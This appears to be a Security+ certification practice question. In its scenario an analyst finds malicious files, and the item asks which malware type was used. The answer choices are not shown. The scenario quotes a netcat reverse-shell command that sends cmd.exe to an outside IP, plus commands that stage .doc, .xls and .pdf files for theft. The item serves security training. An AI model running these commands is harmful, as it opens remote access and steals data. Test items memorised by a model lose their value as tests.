
CompTIA Security+

715 Questions


Question No. 1

A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look suspicious.

One of the files contains the following commands:

cmd /C %TEMP%\nc -e cmd.exe 34.100.43.230

copy    *.doc    > %TEMP%\docfiles.zip

copy    *.xls    > %TEMP%\xlsfiles.zip

copy    *.pdf    > %TEMP%\pdffiles.zip

Which of the following types of malware was used? 

Choose the correct option from the given list.